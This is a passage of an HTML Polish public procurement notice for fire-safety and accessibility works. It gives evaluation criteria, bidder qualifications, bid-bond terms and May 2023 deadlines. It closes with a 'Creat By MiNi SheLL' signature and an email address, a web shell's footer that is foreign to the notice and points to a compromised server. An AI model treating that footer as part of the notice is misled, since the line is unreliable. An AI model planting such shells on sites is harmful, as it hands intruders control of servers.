oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>1.2. oferta została złożona, w określonym przez zamawiającego terminie,<br/>1.3. wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.<br/>1.4. wniesiono poprawnie wadium,<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które<br/>oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie,<br/>pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na<br/>podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100%=100pkt).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie okresu wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu, określone w ogłoszeniu o zamówieniu oraz niniejszej specyfikacji warunków<br/>zamówienia.<br/>2. Warunki udziału w postępowaniu dotyczą:<br/>1) zdolności do występowania w obrocie gospodarczym,<br/>zamawiający wymaga, aby wykonawcy ubiegający się o udzielenie niniejszego zamówienia byli wpisani do jednego z<br/>rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>Warunek ten zamawiający uzna za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i<br/>zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>3) sytuacji ekonomicznej lub finansowej,<br/>Wymagane jest posiadanie przez wykonawcę odpowiedniego ubezpieczenia odpowiedzialności cywilnej - wymagane jest<br/>wykazanie przez wykonawcę -iż musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalnosci<br/>związanej z przedmiotem zamówienia na sumę ubezpieczenia w kwocie co najmniej 100.000,00 zł.<br/>4) zdolności technicznej lub zawodowej,<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3. Postanowienia dotyczące Podmiotów udostępniających zasoby:<br/>1) Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach oraz w<br/>odniesieniu do niniejszego zamówienia polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej innych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim<br/>stosunków prawnych (Podmioty udostępniające zasoby).<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do<br/>realizacji których te zdolności są wymagane.<br/>3) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>niniejszego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>4) Zobowiązanie podmiotu udostępniającego zasoby potwierdza, że stosunek łączący wykonawcę z tym podmiotem /<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>5) Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego<br/>sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych<br/>zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>4. Określone przez Zamawiającego warunki udziału w postępowaniu oraz wymagane środki dowodowe mają na celu ocenę<br/>zdolności wykonawcy do należytego wykonania niniejszego zamówienia. Wykonawcy, którzy nie wykażą spełnienia<br/>warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.<br/>5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są oni wykazać spełnienie<br/>warunków udziału w postępowaniu wspólnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru<br/>lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu - wypełnione i<br/>podpisane przez wykonawcę. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków<br/>udziału w postępowaniu odpowiednio na dzień składania ofert, stanowi dowód tymczasowo zastępujący wymagane przez<br/>zamawiającego podmiotowe środki dowodowe.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Kosztorys ofertowy - wypełniony i podpisany przez wykonawcę. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę.<br/>2) Wykaz osób do kontaktów z zamawiającym.<br/>3) Dokument, o którym mowa w pkt. VI.3. ppkt. 3) SWZ (zobowiązanie podmiotu udostępniającego zasoby) jeżeli<br/>Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów.<br/>4) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 2 składa<br/>każdy z Wykonawców w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z własnym oświadczeniem, o którym mowa w pkt 2, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium.<br/>2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 6000,00 zł słownie: sześć tysięcy złotych.<br/>3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:<br/>1) w pieniądzu,<br/>2) w gwarancjach bankowych,<br/>3) w gwarancjach ubezpieczeniowych<br/>4) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572)<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:<br/>BGK Oddział we Wrocławiu<br/>nr rachunku: 55 1130 1033 0018 8182 1920 0004<br/>z adnotacją: &#34;wadium - Dostosowanie obiektu do wymagań obowiązujących przepisów prawa z zakresu bezpieczeństwa<br/>pożarowego, dostosowanie dla osób niepełnosprawnych ciągów komunikacyjnych - II piętro i parter budynku głównego &#34;<br/>5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>6. Wadium wniesione w pieniądzu należy złożyć z odpowiednim wyprzedzeniem, tak aby wpłynęło ono na rachunek<br/>bankowy Zamawiającego przed upływem terminu składania ofert. Powyższe zalecenie wynika z czasu trwania rozliczeń<br/>międzybankowych. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym<br/>Zamawiającego.<br/>8. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej. Wadium w postaci elektronicznej nie może zawierać postanowień<br/>uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do Gwaranta.<br/>9. Poręczenie, gwarancja lub inny dokument stanowiący wadium winno zawierać w swojej treści nieodwołalne i<br/>bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium na pierwsze<br/>pisemne żądanie Zamawiającego. Dokument ten winien obejmować odpowiedzialność za wszystkie przypadki powodujące<br/>utratę wadium, określone w art. 98 ust. 6 ustawy Pzp.<br/>10. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji warunków zamówienia form wadium<br/>(niewniesienie wadium lub wniesienie w sposób nieprawidłowy) oferta wykonawcy podlegać będzie odrzuceniu.<br/>11. Zamawiający zwróci wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z<br/>okoliczności:<br/>1) upływu terminu związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są oni wykazać spełnienie<br/>warunków udziału w postępowaniu wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne są zmiany zawartej umowy w zakresie uregulowanym w art. 454-455 Ustawy.<br/>Szczegółowe warunki zmian zawartej umowy określa załącznik nr 8 do SWZ &#34;PROJEKT UMOWY&#34;, paragraf 15 - zmiany umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zamówieniowa https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-31 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com